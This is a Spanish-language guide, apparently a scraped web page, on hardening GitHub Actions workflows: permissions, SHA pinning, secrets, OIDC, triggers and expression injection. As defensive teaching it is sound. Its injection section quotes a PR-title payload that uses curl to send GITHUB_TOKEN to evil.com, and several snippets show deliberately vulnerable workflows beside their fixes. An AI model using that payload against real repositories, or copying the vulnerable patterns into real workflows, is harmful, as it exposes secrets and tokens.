El cambio de mayor impacto que puedes hacer en cualquier workflow de GitHub Actions es restringir los permisos. Por defecto, Coloca esto en la parte superior de cada archivo de workflow<\/strong> para que solo lectura sea el valor por defecto para todos los jobs:<\/p>\n Para jobs que nunca interact\u00faan con las APIs de GitHub ni con el repositorio, elimina todos los permisos por completo:<\/p>\n Por qu\u00e9 funciona:<\/strong> Otorga solo lo que cada job necesita:<\/p>\n Regla general:<\/strong> Comienza con Los tags como El comentario al final preserva la legibilidad mientras el SHA bloquea el c\u00f3digo exacto que auditas.<\/p>\n Fijar por SHA no significa dejar de actualizar. Deja que Dependabot proponga actualizaciones de versi\u00f3n autom\u00e1ticamente:<\/p>\n Dependabot entiende los SHA pins. Actualizar\u00e1 el SHA y<\/em> el comentario del tag en un solo PR.<\/p>\n GitHub ofrece tres \u00e1mbitos de secretos. Elige el correcto para minimizar el radio de impacto.<\/p>\n Los environments te permiten proteger despliegues detr\u00e1s de aprobaciones, temporizadores de espera y restricciones de rama:<\/p>\n Luego configura el environment Este es uno de los malentendidos m\u00e1s peligrosos en GitHub Actions:<\/p>\n Nunca hagas esto:<\/strong><\/p>\n Si necesitas Deja de almacenar credenciales de nube de larga duraci\u00f3n como secretos. Usa OpenID Connect para obtener tokens de corta duraci\u00f3n directamente de tu proveedor de nube.<\/p>\n Bloque de permisos requerido para todos los workflows OIDC:<\/strong><\/p>\n Plantilla de Trust Policy de AWS:<\/strong><\/p>\n Beneficio clave:<\/strong> No se almacenan credenciales est\u00e1ticas en ning\u00fan lugar. Los tokens expiran en minutos. La trust policy restringe qu\u00e9 repos, ramas y environments pueden asumir el rol.<\/p>\n No todos los triggers son iguales. Algunos ejecutan c\u00f3digo de fuentes no confiables u otorgan permisos elevados.<\/p>\n Reduce ejecuciones innecesarias y limita la exposici\u00f3n:<\/p>\n Evita que m\u00faltiples despliegues compitan entre s\u00ed:<\/p>\n Cada l\u00ednea Antes de adoptar cualquier action de terceros, verifica:<\/p>\n Para actions que se ejecutan en pipelines sensibles, haz fork a tu organizaci\u00f3n:<\/p>\n Configura un workflow programado para sincronizar tu fork y revisar las diferencias antes de fusionar cambios upstream.<\/p>\n Requiere revisi\u00f3n del equipo de seguridad para cualquier cambio en workflows:<\/p>\n Combina con reglas de protecci\u00f3n de rama que requieran aprobaci\u00f3n de CODEOWNERS para hacerlo aplicable.<\/p>\n Las expresiones de GitHub Actions ( Un t\u00edtulo de PR malicioso como Contextos peligrosos que aceptan entrada del usuario:<\/strong><\/p>\n Cuando el valor fluye a trav\u00e9s de una variable de entorno, el shell lo trata como datos, no como c\u00f3digo. Esta es la soluci\u00f3n para toda<\/strong> inyecci\u00f3n de expresiones.<\/p>\n Las expresiones en condiciones GITHUB_TOKEN<\/code> tiene acceso de lectura y escritura<\/strong> a la mayor\u00eda de los scopes. Anula eso inmediatamente.<\/p>\nPermisos de Solo Lectura por Defecto (Nivel Superior)<\/h3>\n
# .github\/workflows\/ci.yml\nname: CI\non: [push, pull_request]\n\npermissions: read-all\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions\/checkout@v4<\/code><\/pre>\nPermisos Vac\u00edos (Acceso Cero)<\/h3>\n
jobs:\n lint:\n runs-on: ubuntu-latest\n permissions: {}\n steps:\n - uses: actions\/checkout@v4\n - run: npm run lint<\/code><\/pre>\nactions\/checkout<\/code> usa el token para repos privados pero recurre a un clone an\u00f3nimo para los p\u00fablicos. Si tu repo es p\u00fablico, permissions: {}<\/code> es seguro para el checkout.<\/p>\nRecetas de Permisos por Job<\/h3>\n
# Solo checkout (repo privado)\njobs:\n test:\n permissions:\n contents: read\n runs-on: ubuntu-latest\n steps:\n - uses: actions\/checkout@v4\n\n# Desplegar en GitHub Pages\njobs:\n deploy-pages:\n permissions:\n pages: write\n id-token: write\n runs-on: ubuntu-latest\n\n# Push a GitHub Container Registry (GHCR)\njobs:\n push-image:\n permissions:\n contents: read\n packages: write\n runs-on: ubuntu-latest\n\n# Crear un GitHub Release\njobs:\n release:\n permissions:\n contents: write\n runs-on: ubuntu-latest\n\n# Comentar en un Pull Request\njobs:\n comment:\n permissions:\n pull-requests: write\n runs-on: ubuntu-latest<\/code><\/pre>\npermissions: {}<\/code> y a\u00f1ade scopes uno a la vez hasta que el job pase. Nunca dejes los permisos de lectura-escritura por defecto.<\/p>\n2. Pinning de Actions \u2014 Deja de Usar Tags<\/h2>\n
@v4<\/code> son mutables. Un atacante que comprometa una action popular puede mover el tag a un commit malicioso. Fija cada action de terceros a un SHA completo.<\/strong><\/p>\nPinned vs. Sin Pinning<\/h3>\n
# PELIGROSO \u2014 el tag puede moverse a cualquier commit\n- uses: actions\/checkout@v4\n\n# SEGURO \u2014 referencia de commit inmutable\n- uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1<\/code><\/pre>\nEncontrar el SHA de Cualquier Action<\/h3>\n
# Obtener el SHA completo para un tag espec\u00edfico\ngit ls-remote --tags https:\/\/github.com\/actions\/checkout.git v4.1.1\n\n# O usar la API de GitHub\ngh api repos\/actions\/checkout\/git\/ref\/tags\/v4.1.1 --jq '.object.sha'<\/code><\/pre>\nAutomatizar Actualizaciones con Dependabot<\/h3>\n
# .github\/dependabot.yml\nversion: 2\nupdates:\n - package-ecosystem: github-actions\n directory: \"\/\"\n schedule:\n interval: weekly\n commit-message:\n prefix: \"ci\"\n reviewers:\n - \"your-org\/security-team\"\n labels:\n - \"dependencies\"\n - \"ci\"<\/code><\/pre>\n3. Gesti\u00f3n de Secretos<\/h2>\n
Comparaci\u00f3n de \u00c1mbitos de Secretos<\/h3>\n
\n\n
\n \n\u00c1mbito<\/th>\n Visibilidad<\/th>\n Ideal Para<\/th>\n<\/tr>\n<\/thead>\n \n Repositorio<\/strong><\/td>\n Todos los workflows en un repo<\/td>\n API keys y tokens espec\u00edficos del repo<\/td>\n<\/tr>\n \n Environment<\/strong><\/td>\n Solo jobs que apuntan a ese environment<\/td>\n Credenciales de producci\u00f3n, deploy keys<\/td>\n<\/tr>\n \n Organizaci\u00f3n<\/strong><\/td>\n Repos seleccionados en toda la org<\/td>\n Cuentas de servicio compartidas, credenciales de registro<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Reglas de Protecci\u00f3n de Environments<\/h3>\n
jobs:\n deploy-production:\n runs-on: ubuntu-latest\n environment:\n name: production\n url: https:\/\/app.example.com\n permissions:\n id-token: write\n contents: read\n steps:\n - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1\n - name: Deploy\n run: .\/deploy.sh\n env:\n DEPLOY_KEY: ${{ secrets.PRODUCTION_DEPLOY_KEY }}<\/code><\/pre>\nproduction<\/code> en Settings \u2192 Environments<\/strong> con:<\/p>\n\n
main<\/code><\/li>\n<\/ul>\nLa Zona de Peligro de pull_request vs pull_request_target<\/h3>\n
\n\n
\n \nTrigger<\/th>\n C\u00f3digo que se ejecuta<\/th>\n \u00bfSecretos disponibles?<\/th>\n Riesgo<\/th>\n<\/tr>\n<\/thead>\n \n pull_request<\/code><\/td>\nCommit de merge del PR<\/td>\n No (forks)<\/td>\n Bajo<\/td>\n<\/tr>\n \n pull_request_target<\/code><\/td>\nRama base<\/td>\n S\u00ed<\/strong><\/td>\n Cr\u00edtico si haces checkout del c\u00f3digo del PR<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n # VULNERABILIDAD CR\u00cdTICA \u2014 secretos expuestos al c\u00f3digo del PR del fork\non: pull_request_target\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions\/checkout@v4\n with:\n ref: ${{ github.event.pull_request.head.sha }} # Hace checkout de c\u00f3digo NO CONFIABLE del fork\n - run: .\/build.sh # Ejecuta c\u00f3digo controlado por el atacante CON secretos<\/code><\/pre>\npull_request_target<\/code>, nunca hagas checkout del head del PR. Solo \u00fasalo para etiquetar o comentar sobre el c\u00f3digo de la rama base.<\/p>\n4. OIDC \/ Workload Identity Federation<\/h2>\n
permissions:\n id-token: write # Requerido para solicitar el JWT de OIDC\n contents: read # Requerido para actions\/checkout<\/code><\/pre>\nAWS \u2014 Configurar OIDC<\/h3>\n
- name: Configure AWS Credentials\n uses: aws-actions\/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502 # v4.0.2\n with:\n role-to-assume: arn:aws:iam::123456789012:role\/GitHubActions\n aws-region: us-east-1<\/code><\/pre>\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Federated\": \"arn:aws:iam::123456789012:oidc-provider\/token.actions.githubusercontent.com\"\n },\n \"Action\": \"sts:AssumeRoleWithWebIdentity\",\n \"Condition\": {\n \"StringEquals\": {\n \"token.actions.githubusercontent.com:aud\": \"sts.amazonaws.com\"\n },\n \"StringLike\": {\n \"token.actions.githubusercontent.com:sub\": \"repo:your-org\/your-repo:ref:refs\/heads\/main\"\n }\n }\n }\n ]\n}<\/code><\/pre>\nGCP \u2014 Workload Identity Federation<\/h3>\n
- name: Authenticate to Google Cloud\n uses: google-github-actions\/auth@55bd8e7c523b4b80c1b4b5e492ffb613a15f2591 # v2.1.3\n with:\n workload_identity_provider: projects\/123456\/locations\/global\/workloadIdentityPools\/github\/providers\/github\n service_account: github-actions@my-project.iam.gserviceaccount.com<\/code><\/pre>\nAzure \u2014 Credenciales Federadas<\/h3>\n
- name: Azure Login\n uses: azure\/login@6c251865b4e6290e7b78be643ea2d005bc51f69a # v2.1.1\n with:\n client-id: ${{ secrets.AZURE_CLIENT_ID }}\n tenant-id: ${{ secrets.AZURE_TENANT_ID }}\n subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}<\/code><\/pre>\n5. Triggers de Workflows \u2014 Seguros vs. Peligrosos<\/h2>\n
Tabla de Seguridad de Triggers<\/h3>\n
\n\n
\n \nTrigger<\/th>\n Nivel de Riesgo<\/th>\n Notas<\/th>\n<\/tr>\n<\/thead>\n \n push<\/code><\/td>\nBajo<\/td>\n Solo ejecuta c\u00f3digo ya fusionado<\/td>\n<\/tr>\n \n pull_request<\/code><\/td>\nBajo<\/td>\n Sin secretos para forks<\/td>\n<\/tr>\n \n schedule<\/code><\/td>\nBajo<\/td>\n Se ejecuta en la rama por defecto<\/td>\n<\/tr>\n \n workflow_dispatch<\/code><\/td>\nMedio<\/td>\n Trigger manual \u2014 valida los inputs<\/td>\n<\/tr>\n \n pull_request_target<\/code><\/td>\nAlto<\/strong><\/td>\n Secretos disponibles \u2014 ver Secci\u00f3n 3<\/td>\n<\/tr>\n \n issue_comment<\/code><\/td>\nAlto<\/strong><\/td>\n Cualquier comentarista puede activarlo \u2014 protege con verificaciones de permisos<\/td>\n<\/tr>\n \n workflow_run<\/code><\/td>\nAlto<\/strong><\/td>\n Hereda contexto elevado del workflow que lo activ\u00f3<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Filtrado por Rama y Ruta<\/h3>\n
on:\n push:\n branches:\n - main\n - 'releases\/**'\n paths:\n - 'src\/**'\n - 'package.json'\n paths-ignore:\n - 'docs\/**'\n - '*.md'<\/code><\/pre>\nControl de Concurrencia<\/h3>\n
concurrency:\n group: deploy-${{ github.ref }}\n cancel-in-progress: false # No canceles despliegues en curso\n\n# Para builds de PR donde cancelar ejecuciones anteriores es seguro:\nconcurrency:\n group: ci-${{ github.event.pull_request.number || github.sha }}\n cancel-in-progress: true<\/code><\/pre>\n6. Seguridad de Actions de Terceros<\/h2>\n
uses:<\/code> en tu workflow es una dependencia de la cadena de suministro. Tr\u00e1tala como cualquier otra dependencia.<\/p>\nLista de Verificaci\u00f3n de Auditor\u00eda<\/h3>\n
\n
actions\/*<\/code>, aws-actions\/*<\/code>)?<\/li>\naction.yml<\/code> y el script de entrada?<\/li>\nnode_modules<\/code>?<\/li>\n<\/ul>\nHaz Fork de Actions Cr\u00edticas<\/h3>\n
# En lugar de:\n- uses: some-random-org\/deploy-action@v2\n\n# Haz fork y fija:\n- uses: your-org\/deploy-action@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2<\/code><\/pre>\nCODEOWNERS para Archivos de Workflow<\/h3>\n
# .github\/CODEOWNERS\n.github\/workflows\/ @your-org\/security-team\n.github\/actions\/ @your-org\/security-team<\/code><\/pre>\n7. Prevenci\u00f3n de Inyecci\u00f3n de Expresiones<\/h2>\n
${{ }}<\/code>) se expanden como plantilla antes<\/em> de que el shell las vea. Si un atacante controla el valor, controla tu shell.<\/p>\nEl Patr\u00f3n Peligroso<\/h3>\n
# VULNERABLE \u2014 el atacante controla el t\u00edtulo del PR\n- name: Echo PR title\n run: echo \"PR: ${{ github.event.pull_request.title }}\"<\/code><\/pre>\nFix\"; curl http:\/\/evil.com\/steal?token=$GITHUB_TOKEN #<\/code> rompe el echo y exfiltra tu token.<\/p>\n\n
github.event.pull_request.title<\/code><\/li>\ngithub.event.pull_request.body<\/code><\/li>\ngithub.event.issue.title<\/code><\/li>\ngithub.event.issue.body<\/code><\/li>\ngithub.event.comment.body<\/code><\/li>\ngithub.event.review.body<\/code><\/li>\ngithub.event.head_commit.message<\/code><\/li>\ngithub.head_ref<\/code> (nombre de rama desde forks)<\/li>\n<\/ul>\nLa Alternativa Segura \u2014 Variables de Entorno<\/h3>\n
# SEGURO \u2014 el valor se pasa como variable de entorno, no se inyecta en el script\n- name: Echo PR title\n run: echo \"PR: $PR_TITLE\"\n env:\n PR_TITLE: ${{ github.event.pull_request.title }}<\/code><\/pre>\nUso Seguro en Condicionales<\/h3>\n
if:<\/code> son seguras porque son evaluadas por el runtime de Actions, no por el shell:<\/p>\n# SEGURO \u2014 evaluado por el runtime de Actions, no el shell\n- name: Check label\n if: contains(github.event.pull_request.labels.*.name, 'deploy')\n run: echo \"Deploy label found\"<\/code><\/pre>\n8. Errores Comunes \u2014 Top 5 Con Soluciones<\/h2>\n
Error 1: Permisos de Token por Defecto (Excesivamente Permisivos)<\/h3>\n
# MAL \u2014 lectura-escritura impl\u00edcita en todo\non: push\njobs:\n build:\n runs-on: ubuntu-latest\n steps: ...\n\n# CORREGIDO \u2014 solo lectura expl\u00edcita por defecto\non: push\npermissions: read-all\njobs:\n build:\n runs-on: ubuntu-latest\n steps: ...<\/code><\/pre>\nError 2: Usar Tags Mutables para Actions<\/h3>\n
# MAL\n- uses: actions\/setup-node@v4\n\n# CORREGIDO\n- uses: actions\/setup-node@60edb5dd545a775178f52524783378180af0d1f8 # v4.0.2<\/code><\/pre>\nError 3: Credenciales de Nube de Larga Duraci\u00f3n como Secretos<\/h3>\n
# MAL \u2014 claves AWS est\u00e1ticas que nunca expiran\nenv:\n AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}\n AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}\n\n# CORREGIDO \u2014 federaci\u00f3n OIDC, sin credenciales almacenadas\n- uses: aws-actions\/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502\n with:\n role-to-assume: arn:aws:iam::123456789012:role\/GitHubActions\n aws-region: us-east-1<\/code><\/pre>\nError 4: Hacer Checkout del C\u00f3digo del PR en pull_request_target<\/h3>\n
# MAL \u2014 ejecuta c\u00f3digo no confiable con secretos\non: pull_request_target\nsteps:\n - uses: actions\/checkout@v4\n with:\n ref: ${{ github.event.pull_request.head.sha }}\n - run: make build\n\n# CORREGIDO \u2014 usa el trigger pull_request (sin secretos para forks)\non: pull_request\nsteps:\n - uses: actions\/checkout@v4\n - run: make build<\/code><\/pre>\nError 5: Inyecci\u00f3n de Expresiones v\u00eda run:<\/h3>\n
# MAL \u2014 interpolaci\u00f3n directa de entrada del usuario\n- run: echo \"Issue: ${{ github.event.issue.title }}\"\n\n# CORREGIDO \u2014 pasar a trav\u00e9s de variable de entorno\n- run: echo \"Issue: $ISSUE_TITLE\"\n env:\n ISSUE_TITLE: ${{ github.event.issue.title }}<\/code><\/pre>\nTarjeta de Referencia R\u00e1pida<\/h2>\n